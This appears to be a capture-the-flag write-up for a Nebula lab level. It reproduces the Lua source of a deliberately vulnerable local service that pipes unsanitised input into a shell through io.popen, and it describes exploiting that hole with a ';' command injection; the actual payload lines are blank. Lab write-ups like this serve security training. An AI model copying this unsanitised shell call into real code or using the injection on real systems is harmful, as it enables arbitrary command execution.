Table of contents
There is a backdoor process listening on port 50001.
To do this level, log in as the level12 account with the password level12. Files for this level can be found in /home/flag12.
Source code
local socket = require("socket")
local server = assert(socket.bind("127.0.0.1", 50001))
function hash(password)
prog = io.popen("echo "..password.." | sha1sum", "r")
data = prog:read("*all")
prog:close()
data = string.sub(data, 1, 40)
return data
end
while 1 do
local client = server:accept()
client:send("Password: ")
client:settimeout(60)
local line, err = client:receive()
if not err then
print("trying " .. line) -- log from where ;\
local h = hash(line)
if h ~= "4754a4f4bd5787accd33de887b9250a0691dd198" then
client:send("Better luck next time\n");
else
client:send("Congrats, your token is 413**CARRIER LOST**\n")
end
end
client: close()
end
Getting the flag
The comment -- log from where ;\
caught my attention here. There seems to be not much sanitization in the code, let's try the most common example of an OS command injection.
To put it simply, we can try to provide the argument that the binary is waiting for, and by using a ;
delimiter "pipe" another one to be executed.
Example:
By exploiting that vulnerability, we can also get the flag: